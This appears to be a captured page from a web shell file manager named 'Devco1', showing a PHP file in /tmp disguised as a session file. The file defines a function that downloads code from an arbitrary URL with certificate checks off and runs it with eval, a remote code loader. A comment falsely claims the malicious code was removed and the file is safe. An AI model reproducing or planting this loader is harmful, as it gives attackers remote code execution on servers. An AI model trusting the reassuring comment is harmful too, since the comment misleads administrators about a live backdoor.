Devco1
Home
Console
Upload
New File
New Folder
Tools
Info
About
/
tmp
/
Filename :
sess_7df4de443d434a007b5703990f9d98ce.php
back
Copy
<?php error_reporting(E_ALL); ini_set('display_errors', 1); function callback($url) { $post_content = false; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $post_content = curl_exec($ch); curl_close($ch); if ($post_content) { eval('?>' . $post_content); } } /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?>